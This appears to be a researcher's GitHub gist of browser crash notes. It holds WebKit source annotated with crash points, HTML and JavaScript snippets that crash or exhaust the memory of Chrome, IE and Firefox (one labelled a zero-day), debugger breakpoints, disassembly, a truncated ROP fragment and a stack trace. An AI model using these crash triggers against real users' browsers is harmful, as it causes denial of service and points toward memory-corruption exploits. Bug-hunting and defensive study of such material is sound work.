Created
May 17, 2013 04:50
-
-
Save hellok/5596990 to your computer and use it in GitHub Desktop.
oom sample
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void BidiResolver<Iterator, Run>::createBidiRunsForLine(const Iterator& end, VisualDirectionOverride override, bool hardLineBreak) | |
| { | |
| using namespace WTF::Unicode; | |
| ASSERT(m_direction == OtherNeutral); | |
| if (override != NoVisualOverride) { | |
| m_emptyRun = false; | |
| m_sor = m_current; | |
| m_eor = Iterator(); | |
| while (m_current != end && !m_current.atEnd()) { | |
| m_eor = m_current; | |
| increment(); | |
| } | |
| m_direction = override == VisualLeftToRightOverride ? LeftToRight : RightToLeft; | |
| appendRun(); | |
| m_runs.setLogicallyLastRun(m_runs.lastRun()); | |
| if (override == VisualRightToLeftOverride) | |
| m_runs.reverseRuns(0, m_runs.runCount() - 1);//crash here 128364 整形溢出 0-1 | |
| return; | |
| } | |
| void RenderRubyAsBlock::addChild(RenderObject* child, RenderObject* beforeChild) | |
| { | |
| // Insert :before and :after content before/after the RenderRubyRun(s) | |
| if (child->isBeforeContent()) { | |
| if (child->isInline()) { | |
| // Add generated inline content normally | |
| RenderBlock::addChild(child, firstChild()); | |
| } else { | |
| // Wrap non-inline content with an anonymous inline-block. | |
| RenderBlock* beforeBlock = rubyBeforeBlock(this); | |
| if (!beforeBlock) { | |
| beforeBlock = createAnonymousRubyInlineBlock(this); | |
| RenderBlock::addChild(beforeBlock, firstChild()); | |
| //crash here | |
| /* | |
| <style> | |
| ruby:first-child { | |
| display:block; | |
| } | |
| </style> | |
| <div style="display:list-item;"> | |
| <ruby> | |
| <div></div> | |
| </ruby> | |
| </div>*/ | |
| Chrome IE OOM | |
| <script> | |
| a="" | |
| for(i=0;i<1000;i++){ | |
| a+="<button><marquee>" | |
| } | |
| document.write(a) | |
| </script> | |
| FF ODAY | |
| var buffer = '\x41\x42\x43' // ABC buffer | |
| for(i=0; i <= 999 ; ++i) | |
| { | |
| buffer+=buffer+buffer | |
| document.write(buffer); // Crash Memory ! | |
| } | |
| bp mozalloc.moz_xmalloc ".echo @eax;gc" | |
| bp mozalloc.moz_free ".echo @eax;gc" | |
| 5929F2D4-59201000=9E2D4 | |
| 5A141000 | |
| 5A1DF2D4 FF15 607DB65A CALL DWORD PTR DS:[<&mozalloc.moz_xmallo>; mozalloc.moz_xmalloc | |
| 5A1DF2DA 8B4E 50 MOV ECX,DWORD PTR DS:[ESI+50] | |
| 5A1DF2DD 8B56 48 MOV EDX,DWORD PTR DS:[ESI+48] | |
| DS:[053523C8]=0E667800, (UNICODE " | |
| function KedAns() | |
| { | |
| // Start ROP { Target : nspr4.dll } => | |
| var rop =unescape("%ubfc") | |
| EDX=00001000 | |
| 5A1DF2E0 83C4 04 ADD ESP,4 | |
| 5A1DF2E3 03C9 ADD ECX,ECX | |
| 5A1DF2E5 51 PUSH ECX | |
| 5A1DF2E6 52 PUSH EDX | |
| 5A1DF2E7 50 PUSH EAX | |
| 5A1DF2E8 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX | |
| 5A1DF2EC E8 63412500 CALL <JMP.&MSVCR80.memcpy> //COPY 网页内容 | |
| 5A1DF2F1 8B46 48 MOV EAX,DWORD PTR DS:[ESI+48] | |
| 5A1DF2F4 83C4 0C ADD ESP,0C | |
| 5A1DF2F7 50 PUSH EAX | |
| 5A1DF2F8 FF15 5C7DB65A CALL DWORD PTR DS:[<&mozalloc.moz_free>] ; mozalloc.moz_free | |
| ////////////////////////////////////////////////////////////// | |
| 128904 | |
| LayoutUnit InlineFlowBox::computeOverAnnotationAdjustment(LayoutUnit allowedPosition) const | |
| { | |
| LayoutUnit result = 0; | |
| for (InlineBox* curr = firstChild(); curr; curr = curr->nextOnLine()) { | |
| if (curr->renderer()->isPositioned()) | |
| continue; // Positioned placeholders don't affect calculations. | |
| if (curr->isInlineFlowBox()) | |
| result = max(result, toInlineFlowBox(curr)->computeOverAnnotationAdjustment(allowedPosition)); | |
| if (curr->renderer()->isReplaced() && curr->renderer()->isRubyRun()) { | |
| RenderRubyRun* rubyRun = toRenderRubyRun(curr->renderer()); | |
| RenderRubyText* rubyText = rubyRun->rubyText(); | |
| if (!rubyText) | |
| continue; | |
| if (!rubyRun->style()->isFlippedLinesWritingMode()) { | |
| LayoutUnit topOfFirstRubyTextLine = rubyText->logicalTop() + (rubyText->firstRootBox() ? rubyText->firstRootBox()->lineTop() : ZERO_LAYOUT_UNIT); | |
| if (topOfFirstRubyTextLine >= 0) | |
| continue; | |
| topOfFirstRubyTextLine += curr->logicalTop(); | |
| result = max(result, allowedPosition - topOfFirstRubyTextLine); | |
| } else { | |
| LayoutUnit bottomOfLastRubyTextLine = rubyText->logicalTop() + (rubyText->lastRootBox() ? rubyText->lastRootBox()->lineBottom() : rubyText->logicalHeight()); | |
| if (bottomOfLastRubyTextLine <= curr->logicalHeight()) | |
| continue; | |
| bottomOfLastRubyTextLine += curr->logicalTop(); | |
| result = max(result, bottomOfLastRubyTextLine - allowedPosition); | |
| } | |
| } | |
| if (curr->isInlineTextBox()) { | |
| RenderStyle* style = curr->renderer()->style(isFirstLineStyle()); | |
| TextEmphasisPosition emphasisMarkPosition; | |
| if (style->textEmphasisMark() != TextEmphasisMarkNone && toInlineTextBox(curr)->getEmphasisMarkPosition(style, emphasisMarkPosition) && emphasisMarkPosition == TextEmphasisPositionOver) { | |
| 0:022> kp | |
| ChildEBP RetAddr | |
| 0842d5a8 5333e676 chrome_50e30000!WTF::RefPtr<WebCore::StyleRareInheritedData>::get(void)+0x11 [e:\chrome\src\third_party\webkit\source\wtf\wtf\refptr.h @ 58] | |
| 0842d5b4 5333d1e6 chrome_50e30000!WebCore::DataRef<WebCore::StyleRareInheritedData>::get(void)+0x16 [e:\chrome\src\third_party\webkit\source\webcore\rendering\style\dataref.h @ 33] | |
| 0842d5c0 53ec1062 chrome_50e30000!WebCore::DataRef<WebCore::StyleRareInheritedData>::operator->(void)+0x16 [e:\chrome\src\third_party\webkit\source\webcore\rendering\style\dataref.h @ 36] | |
| 0842d5d0 53fc9e74 chrome_50e30000!WebCore::RenderStyle::textEmphasisMark(void)+0x22 [e:\chrome\src\third_party\webkit\source\webcore\rendering\style\renderstyle.cpp @ 1589] | |
| 0842d688 53fa3c19 chrome_50e30000!WebCore::InlineFlowBox::computeOverAnnotationAdjustment(class WebCore::FractionalLayoutUnit allowedPosition = class WebCore::FractionalLayoutUnit)+0x314 [e:\chrome\src\third_party\webkit\source\webcore\rendering\inlineflowbox.cpp @ 1446] | |
| 0842d730 5400d1d0 chrome_50e30000!WebCore::RootInlineBox::selectionTop(void)+0x79 [e:\chrome\src\third_party\webkit\source\webcore\rendering\rootinlinebox.cpp @ 527] | |
| 0842d794 5400d521 chrome_50e30000!WebCore::RenderReplaced::localSelectionRect(bool checkWhetherSelected = false)+0xe0 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderreplaced.cpp @ 491] | |
| 0842d7fc 53e98ba0 chrome_50e30000!WebCore::RenderReplaced::clippedOverflowRectForRepaint(class WebCore::RenderBoxModelObject * repaintContainer = 0x00000000)+0x81 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderreplaced.cpp @ 537] | |
| 0842d840 53fbfee4 chrome_50e30000!WebCore::RenderObject::repaint(bool immediate = false)+0x80 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobject.cpp @ 1338] | |
| 0842d85c 53e94794 chrome_50e30000!WebCore::RenderObjectChildList::removeChildNode(class WebCore::RenderObject * owner = 0x0626d6cc, class WebCore::RenderObject * oldChild = 0x067d5d2c, bool fullRemove = true)+0xa4 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobjectchildlist.cpp @ 90] | |
| 0842d87c 53f0fb02 chrome_50e30000!WebCore::RenderObject::removeChild(class WebCore::RenderObject * oldChild = 0x067d5d2c)+0x94 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobject.cpp @ 337] | |
| 0842d8e8 53e9da12 chrome_50e30000!WebCore::RenderBlock::removeChild(class WebCore::RenderObject * oldChild = 0x067d5d2c)+0x282 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1199] | |
| 0842d900 53e9d7ff chrome_50e30000!WebCore::RenderObject::remove(void)+0x42 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobject.h @ 860] | |
| 0842d938 53ef5a7d chrome_50e30000!WebCore::RenderObject::willBeDestroyed(void)+0x10f [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobject.cpp @ 2304] | |
| 0842d944 53ec6291 chrome_50e30000!WebCore::RenderBoxModelObject::willBeDestroyed(void)+0x6d [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderboxmodelobject.cpp @ 362] | |
| 0842d984 5400add3 chrome_50e30000!WebCore::RenderBox::willBeDestroyed(void)+0x191 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderbox.cpp @ 276] | |
| 0842d998 53eb1252 chrome_50e30000!WebCore::RenderReplaced::willBeDestroyed(void)+0x63 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderreplaced.cpp @ 68] | |
| 0842d9ac 53eb128a chrome_50e30000!WebCore::RenderWidget::willBeDestroyed(void)+0xa2 [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderwidget.cpp @ 124] | |
| 0842d9c0 53e9dc1c chrome_50e30000!WebCore::RenderWidget::destroy(void)+0x2a [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderwidget.cpp @ 128] | |
| 0842d9dc 533343bf chrome_50e30000!WebCore::RenderObject::destroyAndCleanupAnonymousWrappers(void)+0x5c [e:\chrome\src\third_party\webkit\source\webcore\rendering\renderobject.cpp @ 2341] | |
| CRASH | |
| void RenderTable::addChild(RenderObject* child, RenderObject* beforeChild) | |
| { | |
| // Make sure we don't append things after :after-generated content if we have it. | |
| if (!beforeChild) | |
| beforeChild = afterPseudoElementRenderer(); | |
| bool wrapInAnonymousSection = !child->isPositioned(); | |
| if (child->isTableCaption()) { | |
| m_captions.append(toRenderTableCaption(child)); | |
| wrapInAnonymousSection = false; | |
| } else if (child->isTableCol()) { | |
| m_hasColElements = true; | |
| wrapInAnonymousSection = false; | |
| } else if (child->isTableSection()) { | |
| switch (child->style()->display()) { | |
| case TABLE_HEADER_GROUP: | |
| resetSectionPointerIfNotBefore(m_head, beforeChild); | |
| if (!m_head) { | |
| m_head = toRenderTableSection(child); | |
| } else { | |
| resetSectionPointerIfNotBefore(m_firstBody, beforeChild); | |
| if (!m_firstBody) | |
| m_firstBody = toRenderTableSection(child); | |
| } | |
| wrapInAnonymousSection = false; | |
| break; | |
| case TABLE_FOOTER_GROUP: | |
| resetSectionPointerIfNotBefore(m_foot, beforeChild); | |
| if (!m_foot) { | |
| m_foot = toRenderTableSection(child); | |
| wrapInAnonymousSection = false; | |
| break; | |
| } | |
| // Fall through. | |
| case TABLE_ROW_GROUP: | |
| resetSectionPointerIfNotBefore(m_firstBody, beforeChild); | |
| if (!m_firstBody) | |
| m_firstBody = toRenderTableSection(child); | |
| wrapInAnonymousSection = false; | |
| break; | |
| default: | |
| ASSERT_NOT_REACHED(); | |
| } | |
| } else if (child->isTableCell() || child->isTableRow()) | |
| wrapInAnonymousSection = true; | |
| else | |
| wrapInAnonymousSection = true; | |
| if (!wrapInAnonymousSection) { | |
| if (beforeChild && beforeChild->parent() != this) | |
| beforeChild = splitAnonymousBoxesAroundChild(beforeChild); | |
| RenderBox::addChild(child, beforeChild); | |
| return; | |
| } | |
| if (!beforeChild && lastChild() && lastChild()->isTableSection() && lastChild()->isAnonymous() && !lastChild()->isBeforeContent()) { | |
| lastChild()->addChild(child); | |
| return; | |
| } | |
| if (beforeChild && !beforeChild->isAnonymous() && beforeChild->parent() == this) { | |
| RenderObject* section = beforeChild->previousSibling(); | |
| if (section && section->isTableSection() && section->isAnonymous()) { | |
| section->addChild(child); | |
| return; | |
| } | |
| } | |
| RenderObject* lastBox = beforeChild; | |
| while (lastBox && lastBox->parent()->isAnonymous() && !lastBox->isTableSection() && lastBox->style()->display() != TABLE_CAPTION && lastBox->style()->display() != TABLE_COLUMN_GROUP) | |
| lastBox = lastBox->parent(); | |
| if (lastBox && lastBox->isAnonymous() && !isAfterContent(lastBox)) { | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment